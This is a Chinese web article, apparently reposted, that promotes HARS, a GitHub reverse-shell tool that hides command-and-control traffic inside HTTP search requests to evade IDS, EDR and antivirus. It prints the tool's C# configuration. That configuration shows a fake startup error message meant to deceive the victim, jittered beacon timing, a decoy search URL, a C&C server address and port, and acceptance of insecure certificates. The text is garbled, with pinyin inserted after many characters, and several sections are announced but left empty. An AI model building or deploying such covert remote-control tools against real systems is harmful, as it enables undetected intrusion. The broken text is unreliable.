有很多方法可以创建反向shell,以便能【néng】够通过防火墙远程控【kòng】制计【jì】算【suàn】机。确【què】实,传【chuán】出连接并不总【zǒng】是【shì】被过【guò】滤。
但是,安全【quán】软件和硬件(IPS,IDS,Proxy,AV,EDR等)功【gōng】能越来越强大,可以检测【cè】到这些攻【gōng】击。在大多数情况下,通过TCP或UDP隧【suì】道【dào】建立【lì】与【yǔ】反向Shell的连接。我认为最好的【de】检测方法是使它看起【qǐ】来【lái】像合法流量【liàng】。HTTP协议是标准用户【hù】最【zuì】常使用【yòng】的协议。而且【qiě】,它几乎从未被过【guò】滤,以免阻【zǔ】止访【fǎng】问网站。
然后:
依此类推,直到攻击者决定结束会话为止。
实现了以下功能:
有一些【xiē】配置参【cān】数可以【yǐ】在HARS.sln中的Config.cs修【xiū】改。
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 | class Config { /* Behavior */ // Display a fake error msg at startup public static bool DisplayErrorMsg = true; // Title of fake error msg public static string ErrorMsgTitle = "This application could not be started."; // Description of fake error msg public static string ErrorMsgDesc = "Unhandled exception has occured in your application. rr Object {0} is not valid."; // Min delay between the client calls public static int MinDelay = 2; // Max delay between the client calls public static int MaxDelay = 5; // Fake uri requested - Warning : it must begin with "search" (or need a change on server side) public static string Url = "search?q=search+something&qs=n&form=QBRE&cvid="; /* Listener */ // Hostname/IP of C&C server public static string Server = "https://127.0.0.1"; // Listening port of C&C server public static string Port = "443"; // Allow self-signed or "unsecure" certificates - Warning : often needed in corporate environment using proxy public static bool AllowInsecureCertificate = true; } |
更多文档直接看项目说明。
项目地【dì】址【zhǐ】:https://github.com/onSec-fr/Http-Asynchronous-Reverse-Shell
版权所有:深圳市网商在线科技有限公司
友情链接: